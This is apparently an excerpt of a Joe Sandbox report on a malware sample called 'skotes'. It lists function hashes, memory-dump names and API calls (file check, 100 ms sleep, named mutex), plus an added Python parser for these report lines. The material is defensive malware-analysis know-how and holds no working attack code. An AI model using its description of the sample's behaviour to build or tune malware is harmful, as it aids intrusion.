• Instruction ID: 0c34bbb39e0f941d8b8f4afc16991d4035ec435c28ceb7ac8e04d63ea61cdfdd
• Opcode Fuzzy Hash: 86f9b8ffcf67caec2989078c2a847a15e451043f2ef0d08084acfec419729484
• Instruction Fuzzy Hash: 16416EB5A04204ABDB24EF75DC45EBBB7FAEF89300B14442DF856D3611E630A900CF61

Control-flow Graph

APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 00699BA8
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518

Control-flow Graph

APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 00699CDD
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518
• Opcode ID: b9f3cd4741c20521caa3429cd21aaeea9d70dbea207573f9a5b9e5493db3e00c
• Instruction ID: 07187f3faee6933053f74abd6d9513a9914ee39de5583964bfaa55c89d9e257e
• Opcode Fuzzy Hash: b9f3cd4741c20521caa3429cd21aaeea9d70dbea207573f9a5b9e5493db3e00c
• Instruction Fuzzy Hash: 53313731B142408BEF18DBBCCCC87ADB6ABEF86310F24461CE014A7BD5C7358A848761
APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 00699F47
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518
• Opcode ID: d4db729ed3c565c8d6375c141202408c29990577edf85bbb390e611caecb2104
• Instruction ID: 3283ae752539d50487d84df17eb5195be253cea203a865be5082c045514ac502
• Opcode Fuzzy Hash: d4db729ed3c565c8d6375c141202408c29990577edf85bbb390e611caecb2104
• Instruction Fuzzy Hash: 74312A31B102048BEF189BBCDC8C7ADB7A7EB85310F20461DE415D7BD5C735598187A2
APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 0069A07C
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518
• Opcode ID: 2383c3174392d48a56eec9a8557e61e0a47b57f86f0dcd1fec4ca75620d9e70b
• Instruction ID: c8307756874489a539c19593c10f295fc9b1d45586142edc71b4ef15c0825e7a
• Opcode Fuzzy Hash: 2383c3174392d48a56eec9a8557e61e0a47b57f86f0dcd1fec4ca75620d9e70b
• Instruction Fuzzy Hash: 2A312731B102409BEF089BBCCD89BADB7ABEB86314F20421CE01497BD5C77699808796
APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 0069A1B1
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Strings
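Added note and example, not part of the Joe Sandbox report: the two function entries above (Opcode IDs d4db729e... and 2383c317...) list the same Sleep call site (0069A963) and the same CreateMutexA call site (0069A981) and differ only in where GetFileAttributesA is called (0069A07C versus 0069A1B1), so they are overlapping chunks of one routine in the image dumped from process 3 at base 00690000 (snapshot hcaresult_3_2_690000_skotes.jbxd), not two independent behaviours. The routine tests for a file, sleeps 0x64 = 100 ms and creates a mutex whose lpName pointer is 006F3254, the usual single-instance or wait-and-retry guard. The Python below parses the API and memory-dump lines in the form they appear in this report, decodes the fifth dot-separated field of a .sdmp name as a Win32 PAGE_* protection value, and works out which dumped region holds the mutex-name pointer so the string can be read from that .sdmp at the computed offset. Assumptions, labelled in the code: the .sdmp field layout (process index, phase, dump id, base, protection) is inferred from the names on this page and is not documented here; dumped regions are treated as contiguous, each running up to the next listed base; the sample lines are copied from the second function entry above.

```python
"""Parse Joe Sandbox per-function metadata: API call lines and .sdmp dump names.
Added example, not Joe Sandbox code. The .sdmp field layout is an assumption
inferred from the names on the page; the sample lines are copied from the report."""
import re
from dataclasses import dataclass
from typing import Optional

# Win32 page-protection constants (winnt.h), used to decode the dump-name field.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# "Api.MODULE(arg,arg,...), ref: callsite"
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# Assumed layout: proc-index . phase . dump-id . base . protection . three more fields . sdmp
DUMP_NAME = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?:[0-9A-Fa-f]{8}\.){3}sdmp")

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple  # raw tokens as printed, e.g. ("00000064", "?")
    ref: int     # call-site address

    def arg(self, i: int) -> Optional[int]:
        """Argument i as an int, or None when the sandbox printed '?' (unresolved)."""
        tok = self.args[i]
        return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None

@dataclass(frozen=True)
class MemDump:
    proc: int
    phase: int
    dump_id: int
    base: int
    protect: int

    @property
    def protection(self) -> str:
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:X}")

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.search(line)
    if not m:
        return None
    raw = m["args"].strip()
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))

def parse_dump_name(text: str) -> Optional[MemDump]:
    m = DUMP_NAME.search(text)
    if not m:
        return None
    return MemDump(int(m["proc"], 16), int(m["phase"], 16), int(m["dump_id"]),
                   int(m["base"], 16), int(m["protect"], 16))

def locate(addr: int, dumps) -> Optional[MemDump]:
    """Dump whose base is the highest one not above addr. Assumes the dumped
    regions are contiguous, i.e. each region runs up to the next listed base."""
    below = [d for d in dumps if d.base <= addr]
    return max(below, key=lambda d: d.base) if below else None

def mutex_name_ptr(calls) -> Optional[int]:
    """lpName of the first CreateMutexA/W call; None if absent or NULL (unnamed mutex)."""
    for c in calls:
        if c.api in ("CreateMutexA", "CreateMutexW") and len(c.args) == 3:
            return c.arg(2) or None
    return None

# Constructed sample: API and dump lines copied from the second function entry above.
REPORT_API_LINES = [
    "• GetFileAttributesA.KERNEL32(00000000), ref: 0069A1B1",
    "• Sleep.KERNEL32(00000064,?), ref: 0069A963",
    "• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981",
]
REPORT_DUMP_LINES = [
    "• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true",
    "• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp",
    "• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp",
    "• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp",
    "• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp",
    "• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp",
]

def analyse(api_lines=REPORT_API_LINES, dump_lines=REPORT_DUMP_LINES) -> dict:
    """Summarise one function entry: API chain, Sleep interval, and where lpName lives."""
    calls = [c for c in map(parse_api_line, api_lines) if c]
    dumps = [d for d in map(parse_dump_name, dump_lines) if d]
    names = {c.api for c in calls}
    ptr = mutex_name_ptr(calls)
    region = locate(ptr, dumps) if ptr is not None else None
    return {
        "chain": [c.api for c in calls],
        # Sleep combined with a named mutex is the usual single-instance / retry guard.
        "mutex_guard": ptr is not None and "Sleep" in names,
        "sleep_ms": next((c.arg(0) for c in calls if c.api == "Sleep"), None),
        "mutex_name_ptr": ptr,
        "region_base": region.base if region else None,
        "region_protection": region.protection if region else None,
        "offset_in_dump": ptr - region.base if region else None,
    }

if __name__ == "__main__":
    print(analyse())
```

Run as-is it reports the chain GetFileAttributesA, Sleep, CreateMutexA, a 100 ms sleep, and places 006F3254 in the region dumped at 006F2000 (protection 0x40, PAGE_EXECUTE_READWRITE) at offset 0x1254. Assuming each .sdmp file is a raw copy of its region starting at the listed base, the mutex name is the NUL-terminated string at that offset in the 006F2000 dump; that it sits in writable-and-executable memory is consistent with the "changes PE section rights" detection in the report summary.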
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518
• Opcode ID: 80f2b0e135afb1192687d5d06332ea41b345f7f9a8eaa5a88ed8bef0ac3b3cb0
• Instruction ID: 264894f3b2a2b3428b6d4b9c7d78baf3ba2cf510bc0d4219b409db424ee335a5
• Opcode Fuzzy Hash: 80f2b0e135afb1192687d5d06332ea41b345f7f9a8eaa5a88ed8bef0ac3b3cb0
• Instruction Fuzzy Hash: E1312931B102409BEF089BBCDD8D76DB7B7EB86310F24421CE0149BBD5C7754A808796
APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 0069A2E6
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518
• Opcode ID: 6239fc69d2f8d5dbae8d7f873dbf16cbdb6924e5ef6bf44c3a740f992ddfb3dc
• Instruction ID: 230d2f4b7e8e1296df3463a0277e18e21e31691f439cd7b2c1cde5885ba63449
• Opcode Fuzzy Hash: 6239fc69d2f8d5dbae8d7f873dbf16cbdb6924e5ef6bf44c3a740f992ddfb3dc
• Instruction Fuzzy Hash: BB312831B102409BEF189BBCDC8976DB7BBEB86310F24421CE415DBBD5C77699808792
APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 0069A41B
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518
• Opcode ID: c74f87f6d3886ff83c75ec79fcb64848486a20cc2258bacd3abb744f701a3e4c
• Instruction ID: 761074bd5a7ed0a72618d309932263fb1dfca460b23ca0df0f151688635ea9c5
• Opcode Fuzzy Hash: c74f87f6d3886ff83c75ec79fcb64848486a20cc2258bacd3abb744f701a3e4c
• Instruction Fuzzy Hash: FA311731B502009BEF08ABBCDD8DB6DB6EBEB86310F20421CE0549BBD5D77589808696
APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 0069A550
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
